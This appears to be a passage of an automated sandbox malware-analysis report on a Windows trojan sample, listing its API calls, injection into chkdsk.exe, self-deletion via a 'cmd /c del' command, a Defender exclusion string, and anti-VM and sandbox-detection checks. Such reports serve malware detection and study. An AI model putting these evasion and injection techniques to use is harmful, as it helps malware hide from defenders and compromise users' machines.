          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309B00 NtSetValueKey,3_2_01309B00
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309770 NtSetInformationFile,3_2_01309770
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0130A770 NtOpenThread,3_2_0130A770
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309760 NtOpenProcess,3_2_01309760
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0130A3B0 NtGetContextThread,3_2_0130A3B0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309610 NtEnumerateValueKey,3_2_01309610
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309A10 NtQuerySection,3_2_01309A10
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309670 NtQueryInformationProcess,3_2_01309670
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309650 NtQueryValueKey,3_2_01309650
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309A80 NtOpenDirectoryObject,3_2_01309A80
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013096D0 NtCreateKey,3_2_013096D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_05389910
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389540 NtReadFile,LdrInitializeThunk,11_2_05389540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053899A0 NtCreateSection,LdrInitializeThunk,11_2_053899A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053895D0 NtClose,LdrInitializeThunk,11_2_053895D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389860 NtQuerySystemInformation,LdrInitializeThunk,11_2_05389860
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389840 NtDelayExecution,LdrInitializeThunk,11_2_05389840
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389710 NtQueryInformationToken,LdrInitializeThunk,11_2_05389710
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389780 NtMapViewOfSection,LdrInitializeThunk,11_2_05389780
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389FE0 NtCreateMutant,LdrInitializeThunk,11_2_05389FE0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_05389660
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389650 NtQueryValueKey,LdrInitializeThunk,11_2_05389650
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389A50 NtCreateFile,LdrInitializeThunk,11_2_05389A50
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053896E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_053896E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053896D0 NtCreateKey,LdrInitializeThunk,11_2_053896D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0538AD30 NtSetContextThread,11_2_0538AD30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389520 NtWaitForSingleObject,11_2_05389520
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389560 NtWriteFile,11_2_05389560
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389950 NtQueueApcThread,11_2_05389950
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053895F0 NtQueryInformationFile,11_2_053895F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053899D0 NtCreateProcessEx,11_2_053899D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389820 NtEnumerateKey,11_2_05389820
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0538B040 NtSuspendThread,11_2_0538B040
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053898A0 NtWriteVirtualMemory,11_2_053898A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053898F0 NtReadVirtualMemory,11_2_053898F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389730 NtQueryVirtualMemory,11_2_05389730
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0538A710 NtOpenProcessToken,11_2_0538A710
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389B00 NtSetValueKey,11_2_05389B00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389770 NtSetInformationFile,11_2_05389770
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0538A770 NtOpenThread,11_2_0538A770
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389760 NtOpenProcess,11_2_05389760
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0538A3B0 NtGetContextThread,11_2_0538A3B0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053897A0 NtUnmapViewOfSection,11_2_053897A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389A20 NtResumeThread,11_2_05389A20
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389610 NtEnumerateValueKey,11_2_05389610
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389A10 NtQuerySection,11_2_05389A10
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389A00 NtProtectVirtualMemory,11_2_05389A00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389670 NtQueryInformationProcess,11_2_05389670
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05389A80 NtOpenDirectoryObject,11_2_05389A80
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00AC85F0 NtCreateFile,11_2_00AC85F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00AC86A0 NtReadFile,11_2_00AC86A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00AC87D0 NtAllocateVirtualMemory,11_2_00AC87D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00AC8720 NtClose,11_2_00AC8720
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00AC85EB NtCreateFile,11_2_00AC85EB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00AC87CA NtAllocateVirtualMemory,11_2_00AC87CA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00AC871A NtClose,11_2_00AC871A
          Source: 2u2u8wnrrW.exeBinary or memory string: OriginalFilename vs 2u2u8wnrrW.exe
          Source: 2u2u8wnrrW.exe, 00000000.00000002.377823942.0000000008080000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll< vs 2u2u8wnrrW.exe
          Source: 2u2u8wnrrW.exe, 00000000.00000002.373659733.0000000001030000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCustomAttributeTy.exeD vs 2u2u8wnrrW.exe
          Source: 2u2u8wnrrW.exe, 00000000.00000002.374665647.00000000033B1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameriched20.dllp( vs 2u2u8wnrrW.exe
          Source: 2u2u8wnrrW.exe, 00000000.00000002.374665647.00000000033B1000.00000004.00000001.sdmpBinary or memory string: m,\\StringFileInfo\\000004B0\\OriginalFilename vs 2u2u8wnrrW.exe
          Source: 2u2u8wnrrW.exe, 00000003.00000003.372193158.0000000001086000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 2u2u8wnrrW.exe
          Source: 2u2u8wnrrW.exe, 00000003.00000000.371733879.00000000008B0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCustomAttributeTy.exeD vs 2u2u8wnrrW.exe
          Source: 2u2u8wnrrW.exe, 00000003.00000002.442477698.0000000001296000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs 2u2u8wnrrW.exe
          Source: 2u2u8wnrrW.exeBinary or memory string: OriginalFilenameCustomAttributeTy.exeD vs 2u2u8wnrrW.exe
          Source: 2u2u8wnrrW.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 2u2u8wnrrW.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: 2u2u8wnrrW.exeVirustotal: Detection: 16%
          Source: 2u2u8wnrrW.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\2u2u8wnrrW.exe 'C:\Users\user\Desktop\2u2u8wnrrW.exe'
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess created: C:\Users\user\Desktop\2u2u8wnrrW.exe C:\Users\user\Desktop\2u2u8wnrrW.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2u2u8wnrrW.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess created: C:\Users\user\Desktop\2u2u8wnrrW.exe C:\Users\user\Desktop\2u2u8wnrrW.exeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2u2u8wnrrW.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2u2u8wnrrW.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@9/6
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_01
          Source: 2u2u8wnrrW.exeString found in binary or memory: es>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvail
          Source: 2u2u8wnrrW.exeString found in binary or memory: es>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvail
          Source: 2u2u8wnrrW.exeString found in binary or memory: ble> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle
          Source: 2u2u8wnrrW.exeString found in binary or memory: ble> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: 2u2u8wnrrW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 2u2u8wnrrW.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: chkdsk.pdbGCTL source: 2u2u8wnrrW.exe, 00000003.00000002.442464835.0000000001290000.00000040.00020000.sdmp
          Source: Binary string: chkdsk.pdb source: 2u2u8wnrrW.exe, 00000003.00000002.442464835.0000000001290000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 2u2u8wnrrW.exe, 00000003.00000003.372062420.0000000000F70000.00000004.00000001.sdmp, chkdsk.exe, 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 2u2u8wnrrW.exe, chkdsk.exe

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: 2u2u8wnrrW.exe, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.2u2u8wnrrW.exe.fd0000.0.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.2u2u8wnrrW.exe.fd0000.0.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.2.2u2u8wnrrW.exe.850000.1.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.2u2u8wnrrW.exe.850000.0.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0041B832 push eax; ret 3_2_0041B838
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0041B83B push eax; ret 3_2_0041B8A2
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0041B89C push eax; ret 3_2_0041B8A2
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0041B7E5 push eax; ret 3_2_0041B838
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0131D0D1 push ecx; ret 3_2_0131D0E4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0539D0D1 push ecx; ret 11_2_0539D0E4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00ACB89C push eax; ret 11_2_00ACB8A2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00ACB83B push eax; ret 11_2_00ACB8A2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00ACB832 push eax; ret 11_2_00ACB838
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00ACB7E5 push eax; ret 11_2_00ACB838
          Source: initial sampleStatic PE information: section name: .text entropy: 7.73579206454

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: /c del 'C:\Users\user\Desktop\2u2u8wnrrW.exe'
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: /c del 'C:\Users\user\Desktop\2u2u8wnrrW.exe'Jump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.2u2u8wnrrW.exe.34011f4.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.374665647.00000000033B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 2u2u8wnrrW.exe PID: 6996, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: 2u2u8wnrrW.exe, 00000000.00000002.374665647.00000000033B1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: 2u2u8wnrrW.exe, 00000000.00000002.374665647.00000000033B1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000AB8614 second address: 0000000000AB861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000AB89AE second address: 0000000000AB89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe TID: 7000Thread sleep time: -31259s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe TID: 7028Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 6712Thread sleep time: -34000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_004088E0 rdtsc 3_2_004088E0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeThread delayed: delay time: 31259Jump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: 2u2u8wnrrW.exe, 00000000.00000002.374665647.00000000033B1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000000.390676176.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.407392847.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.391478840.0000000008643000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 2u2u8wnrrW.exe, 00000000.00000002.374665647.00000000033B1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.381162401.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 2u2u8wnrrW.exe, 00000000.00000002.374665647.00000000033B1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.407392847.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.381162401.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.390410007.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.392962834.000000000D462000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
          Source: explorer.exe, 00000005.00000000.390410007.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.390676176.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: 2u2u8wnrrW.exe, 00000000.00000002.374665647.00000000033B1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.375200182.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_004088E0 rdtsc 3_2_004088E0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0134A537 mov eax, dword ptr fs:[00000030h]3_2_0134A537
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01398D34 mov eax, dword ptr fs:[00000030h]3_2_01398D34
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012E4120 mov eax, dword ptr fs:[00000030h]3_2_012E4120
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012E4120 mov eax, dword ptr fs:[00000030h]3_2_012E4120
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012E4120 mov eax, dword ptr fs:[00000030h]3_2_012E4120
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012E4120 mov eax, dword ptr fs:[00000030h]3_2_012E4120
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012E4120 mov ecx, dword ptr fs:[00000030h]3_2_012E4120
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F4D3B mov eax, dword ptr fs:[00000030h]3_2_012F4D3B
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F4D3B mov eax, dword ptr fs:[00000030h]3_2_012F4D3B
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F4D3B mov eax, dword ptr fs:[00000030h]3_2_012F4D3B
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F513A mov eax, dword ptr fs:[00000030h]3_2_012F513A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F513A mov eax, dword ptr fs:[00000030h]3_2_012F513A
